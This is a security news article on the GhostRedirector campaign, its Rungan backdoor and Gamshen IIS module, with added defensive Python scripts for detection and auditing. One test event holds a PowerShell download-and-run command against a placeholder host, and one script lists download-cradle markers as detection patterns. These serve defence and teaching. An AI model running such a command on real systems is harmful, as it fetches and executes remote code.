Fyself News
GhostRedirector Hacks 65 Windows Servers Using Rungan Backdoor and Gamshen IIS Module

By user, September 4, 2025, 4 min read

Cybersecurity researchers have lifted the lid on a previously undocumented threat cluster called GhostRedirector, which has compromised at least 65 Windows servers, mainly in Brazil, Thailand and Vietnam.

According to Slovak cybersecurity company ESET, the attacks led to the deployment of a passive C++ backdoor called Rungan and a native Internet Information Services (IIS) module codenamed Gamshen. The threat actor is believed to have been active since at least August 2024.

“Rungan has the ability to run commands on the compromised server, while Gamshen’s purpose is to carry out SEO fraud, that is, to manipulate search engine results and boost the page ranking of configured target websites.”

“Gamshen only modifies the response to requests coming from Googlebot, that is, it neither serves malicious content to nor otherwise affects the website’s regular visitors, but participation in the SEO fraud scheme can damage the reputation of the websites hosted on the compromised server by associating them with shady SEO techniques and with the boosted websites.”

Other countries with victims include Peru, the United States, Canada, Finland, India, the Netherlands, the Philippines and Singapore. The targeting appears indiscriminate, with affected entities spanning the education, healthcare, insurance, transportation, technology and retail sectors.

Initial access to the target network is believed to be obtained by exploiting a vulnerability, probably an SQL injection flaw. PowerShell is then used to deliver additional tools hosted on the staging server 868ID[.]com.

“This speculation is supported by the observation that most of the unauthorized PowerShell executions came from the SqlServer.exe binary.”
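A detection that follows from the observation above, written here as an added example rather than as ESET's or the article's own code: flag process-creation events in which a shell or PowerShell is spawned by the SQL Server service binary. The events below are constructed in the shape of Sysmon Event ID 1 fields; the install paths, user names, command lines and the `staging.example` URL are placeholders. The database engine normally runs as sqlservr.exe, so the rule matches that name alongside the SqlServer.exe spelling used in the quote.

```python
import ntpath

# Constructed process-creation events in Sysmon Event ID 1 style.
# Not real telemetry; the staging URL and paths are placeholders.
SAMPLE_EVENTS = [
    {   # SQL Server spawning PowerShell with a download cradle: the pattern described above
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
        "CommandLine": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://staging.example/a.ps1')\"",
        "User": r"NT SERVICE\MSSQLSERVER",
    },
    {   # xp_cmdshell style: SQL Server spawns cmd.exe first
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
        "CommandLine": "cmd.exe /c whoami",
        "User": r"NT SERVICE\MSSQLSERVER",
    },
    {   # Benign: an administrator opening PowerShell from Explorer
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe",
        "User": r"CORP\admin",
    },
    {   # Benign: IIS worker process (not SQL Server) spawning a console host
        "Image": r"C:\Windows\System32\conhost.exe",
        "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
        "CommandLine": "conhost.exe 0x4",
        "User": r"IIS APPPOOL\DefaultAppPool",
    },
]

SQL_SERVER_BINARIES = {"sqlservr.exe", "sqlserver.exe"}
SHELL_BINARIES = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Command-line markers that raise severity: download cradles and encoded payloads.
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ",
                    "-enc", "-encodedcommand", "frombase64string")


def _basename(path):
    # ntpath handles Windows separators regardless of the analysis host's OS
    return ntpath.basename(path).lower()


def flag_sql_spawned_shells(events):
    """Return (event, severity) pairs for shells spawned by the SQL Server service.

    severity is "high" when the command line also carries a download or
    encoding marker, otherwise "medium".
    """
    findings = []
    for ev in events:
        parent = _basename(ev.get("ParentImage", ""))
        child = _basename(ev.get("Image", ""))
        if parent not in SQL_SERVER_BINARIES or child not in SHELL_BINARIES:
            continue
        cmd = ev.get("CommandLine", "").lower()
        severity = "high" if any(m in cmd for m in DOWNLOAD_MARKERS) else "medium"
        findings.append((ev, severity))
    return findings


if __name__ == "__main__":
    for ev, sev in flag_sql_spawned_shells(SAMPLE_EVENTS):
        print(f"[{sev}] {ev['ParentImage']} -> {ev['CommandLine']}")
```

On a real estate the same rule translates directly to a Sysmon or EDR query on ParentImage and Image; legitimate SQL Agent jobs that shell out will also match, so baseline those by command line rather than by dropping the rule.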

Rungan is designed to wait for incoming requests to URLs that match predefined patterns (e.g. “https://+:80/v1.0/8888/sys.html”), then parse and execute the commands embedded in them. It supports four different commands:

  • mkuser, to create a user on the server with the provided username and password
  • listfolder, to collect information from the provided path (unfinished)
  • addurl, to register a new URL on which the backdoor can listen
  • cmd, to run commands on the server using pipes and the CreateProcessA API
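Because Rungan registers its URL pattern directly with the Windows HTTP Server API (http.sys) rather than as an IIS site binding, one way to hunt for it is to list every URL registered with the kernel listener and compare the result against a baseline. The Python below is an added example, not code from ESET or the article: it parses the text that `netsh http show servicestate view=requestq` prints, collecting the lines that follow each “Registered URLs:” marker, and flags registrations that are not in a per-server allowlist or that look odd in the way the Rungan pattern does (an https scheme bound to port 80, and a file-like endpoint registered straight with http.sys). The netsh excerpt is constructed to mirror the shape of that output, and the allowlist is an assumption that each server would maintain for itself.

```python
import re

# Constructed excerpt in the shape of `netsh http show servicestate view=requestq`;
# only the "Registered URLs:" blocks matter to the parser. Not real output.
SAMPLE_NETSH = """\
Snapshot of HTTP service state (Request Queue View):
-----------------------------------------------------

Request queue name: Request queue is unnamed.
    Version: 2.0
    State: Active
    URL groups:
    URL group ID: FE00000040000001
        State: Active
        Number of registered URLs: 2
        Registered URLs:
            HTTP://*:80/
            HTTPS://*:443/

Request queue name: Request queue is unnamed.
    Version: 2.0
    State: Active
    URL groups:
    URL group ID: FE00000040000002
        State: Active
        Number of registered URLs: 2
        Registered URLs:
            HTTP://+:5985/WSMAN/
            HTTPS://+:80/V1.0/8888/SYS.HTML
"""

# Assumed per-server baseline: the IIS site bindings plus WinRM.
KNOWN_GOOD = {
    "http://*:80/",
    "https://*:443/",
    "http://+:5985/wsman/",
    "https://+:5986/wsman/",
}

URL_LINE = re.compile(r"^\s*(https?://\S+)\s*$", re.IGNORECASE)
URL_PARTS = re.compile(r"^(https?)://([^/:]+):(\d+)(/.*)$")


def registered_urls(netsh_output):
    """Collect every URL listed under a 'Registered URLs:' marker, lower-cased."""
    urls, in_block = [], False
    for line in netsh_output.splitlines():
        if line.strip().lower().startswith("registered urls:"):
            in_block = True
            continue
        if in_block:
            m = URL_LINE.match(line)
            if m:
                urls.append(m.group(1).lower())
            else:
                in_block = False  # a block ends at the first non-URL line
    return urls


def suspicious_registrations(urls, known_good=KNOWN_GOOD):
    """Return (url, reasons) for registrations worth a closer look."""
    findings = []
    for url in urls:
        reasons = []
        if url not in known_good:
            reasons.append("not in baseline")
        m = URL_PARTS.match(url)
        if m:
            scheme, port, path = m.group(1), int(m.group(3)), m.group(4)
            if (scheme == "https" and port == 80) or (scheme == "http" and port == 443):
                reasons.append("scheme/port mismatch")
            if re.search(r"\.[a-z0-9]{2,5}$", path):
                reasons.append("file-like endpoint registered directly with http.sys")
        if reasons:
            findings.append((url, reasons))
    return findings


if __name__ == "__main__":
    for url, reasons in suspicious_registrations(registered_urls(SAMPLE_NETSH)):
        print(url, "->", "; ".join(reasons))
```

Run `netsh http show servicestate view=requestq > state.txt` on the server and feed the file to `registered_urls`. Check the live service state rather than only `netsh http show urlacl`: URL reservations are needed for non-administrative accounts, but a process running as SYSTEM can register a URL without one, so a passive backdoor with elevated privileges leaves no trace in the reservation list.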

Gamshen, written in C/C++, is an instance of the IIS malware class ESET refers to as “Group 13”, which can act both as a backdoor and as an SEO fraud tool. It works much like IISerpent, another IIS-specific malware family documented by ESET in August 2021.

Configured as a malicious extension to Microsoft’s web server software, IISerpent intercepts the HTTP requests made to websites hosted on the compromised server, specifically those coming from search engine crawlers, and modifies the server’s HTTP response with the goal of steering search engines toward websites of the attacker’s choosing.
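Gamshen and IISerpent are native IIS modules, which IIS loads from the `<globalModules>` section of %windir%\System32\inetsrv\config\applicationHost.config. A quick audit, written here as an added example rather than anything from ESET or the article, is to list those modules and flag any whose image lives outside the directories Microsoft ships modules from. The config excerpt is constructed; the module name `SEOModule` and its path are invented for illustration, and the trusted-directory list is an assumption that a site running other third-party modules would extend.

```python
import ntpath
import re
import xml.etree.ElementTree as ET

# Constructed applicationHost.config excerpt (not from a real server).
# The module "SEOModule" and its path are invented for the example.
SAMPLE_CONFIG = r"""<configuration>
  <system.webServer>
    <globalModules>
      <add name="UriCacheModule" image="%windir%\System32\inetsrv\cachuri.dll" />
      <add name="StaticFileModule" image="%windir%\System32\inetsrv\static.dll" />
      <add name="RewriteModule" image="%SystemRoot%\system32\inetsrv\rewrite.dll" />
      <add name="ManagedEngineV4.0_64bit" image="%windir%\Microsoft.NET\Framework64\v4.0.30319\webengine4.dll" preCondition="integratedMode,runtimeVersionv4.0,bitness64" />
      <add name="AspNetCoreModuleV2" image="%ProgramFiles%\IIS\Asp.Net Core Module\V2\aspnetcorev2.dll" />
      <add name="SEOModule" image="C:\Windows\Temp\seo.dll" />
    </globalModules>
  </system.webServer>
</configuration>
"""

# Environment values assumed for offline evaluation; on a live host use os.environ.
ENV = {"windir": "C:\\Windows", "systemroot": "C:\\Windows", "programfiles": "C:\\Program Files"}

# Directories Microsoft ships IIS modules from (assumed baseline; extend per server).
TRUSTED_DIRS = (
    "c:\\windows\\system32\\inetsrv\\",
    "c:\\windows\\syswow64\\inetsrv\\",
    "c:\\windows\\microsoft.net\\",
    "c:\\program files\\iis\\",
)


def expand_env(path, env=ENV):
    """Expand %VAR% tokens case-insensitively from the supplied mapping."""
    return re.sub(r"%([^%]+)%", lambda m: env.get(m.group(1).lower(), m.group(0)), path)


def audit_global_modules(config_xml, env=ENV, trusted=TRUSTED_DIRS):
    """Return (name, image) for global modules loaded from untrusted locations."""
    root = ET.fromstring(config_xml)
    section = root.find(".//globalModules")
    if section is None:
        return []
    flagged = []
    for add in section.findall("add"):
        name, image = add.get("name", ""), add.get("image", "")
        # normpath collapses ./.. and mixed separators before the prefix check
        resolved = ntpath.normpath(expand_env(image, env)).lower()
        if not resolved.startswith(trusted):
            flagged.append((name, image))
    return flagged


if __name__ == "__main__":
    for name, image in audit_global_modules(SAMPLE_CONFIG):
        print(f"review: {name} -> {image}")
```

Treat the output as a triage list, not a verdict: confirm each flagged DLL with `Get-AuthenticodeSignature`, check that it is actually enabled in a site's `<modules>` section, and compare against a known-good server of the same role. The same list is available live through `Get-WebGlobalModule` from the WebAdministration module.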

“GhostRedirector attempts to manipulate Google search rankings for certain third-party websites using manipulative, shady SEO techniques, such as creating artificial backlinks from legitimate and compromised websites to the target websites,” Tavella said.

It is currently unknown which sites these backlinks ultimately lead unsuspecting users to, but the SEO fraud scheme is believed to be promoting various gambling websites.
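The behaviour described above, a response that differs only when the visitor identifies as Googlebot, can be checked from outside the server. The script below is an added example, not from ESET or the article: it extracts the anchor targets from two copies of the same page, one fetched with an ordinary browser User-Agent and one with Googlebot's, and reports links that appear only in the crawler's copy. The two HTML documents are constructed to stand in for those fetches and the `.example` domains are placeholders; `fetch_pair` is included for a live run. One caveat: a module may identify crawlers by source address rather than User-Agent, in which case a spoofed header alone will not trigger the injection.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit
import urllib.request

GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
BROWSER_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/124.0 Safari/537.36")

# Constructed responses standing in for the two fetches; domains are placeholders.
NORMAL_HTML = """<html><body>
<h1>Clinic schedule</h1>
<a href="/appointments">Book</a>
<a href="https://www.example.org/about">About us</a>
</body></html>"""

CRAWLER_HTML = """<html><body>
<h1>Clinic schedule</h1>
<a href="/appointments">Book</a>
<a href="https://www.example.org/about">About us</a>
<div style="display:none">
<a href="https://bet-placeholder.example/">best online casino</a>
<a href="https://slots-placeholder.example/promo">free slots bonus</a>
</div>
</body></html>"""


class LinkCollector(HTMLParser):
    """Collect href targets of <a> tags along with their anchor text."""

    def __init__(self):
        super().__init__()
        self.links = {}
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self._current = href
                self.links.setdefault(href, "")

    def handle_data(self, data):
        if self._current is not None:
            self.links[self._current] += data.strip()

    def handle_endtag(self, tag):
        if tag == "a":
            self._current = None


def extract_links(html):
    parser = LinkCollector()
    parser.feed(html)
    return parser.links


def find_cloaked_links(normal_html, crawler_html):
    """Return {href: anchor_text} for links served only to the crawler."""
    normal = extract_links(normal_html)
    crawler = extract_links(crawler_html)
    return {href: text for href, text in crawler.items() if href not in normal}


def external_hosts(links, page_host):
    """Hosts of injected links that point away from the audited site."""
    hosts = {urlsplit(h).hostname for h in links}
    return sorted(h for h in hosts if h and h != page_host)


def fetch_pair(url, timeout=15):
    """Fetch the same URL as a browser and as Googlebot (live use only)."""
    def get(user_agent):
        req = urllib.request.Request(url, headers={"User-Agent": user_agent})
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", errors="replace")
    return get(BROWSER_UA), get(GOOGLEBOT_UA)


if __name__ == "__main__":
    injected = find_cloaked_links(NORMAL_HTML, CRAWLER_HTML)
    for href, text in injected.items():
        print(f"crawler-only link: {href} ({text!r})")
    print("external hosts:", external_hosts(injected, "www.example.org"))
```

For a live check, call `fetch_pair` against a few pages of the suspected site and pass the two documents to `find_cloaked_links`; a non-empty result, especially with gambling-related anchor text pointing at unrelated hosts, is the symptom the quotes describe.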

Alongside Rungan and Gamshen, various other tools are dropped:

  • GoToHTTP, to establish a remote connection accessible from a web browser
  • BadPotato or EfsPotato, to create privileged users in the administrators group
  • Zunput, to gather information about the websites hosted on the IIS server and drop ASP, PHP and JavaScript web shells

GhostRedirector is assessed to be a China-aligned threat actor, based on hard-coded Chinese strings in the malware source code and on a code-signing certificate issued to a Chinese company, Shenzhen Diyuan Technology Co., Ltd., which the group used to sign its privilege-escalation artifacts.

That said, GhostRedirector is not the first China-linked threat actor to use malicious IIS modules for SEO fraud. Over the past year, Cisco Talos and Trend Micro have detailed a Chinese-speaking group known as DragonRank that has run SEO manipulation operations via the BadIIS malware.

“Gamshen abuses the reliability of the websites hosted on the compromised servers to promote third-party gambling websites.”

“In addition to creating compromised user accounts, GhostRedirector demonstrates persistence and operational resilience by deploying multiple remote access tools on compromised servers to maintain long-term access to the compromised infrastructure.”


© 2025 news.fyself. Designed by fyself.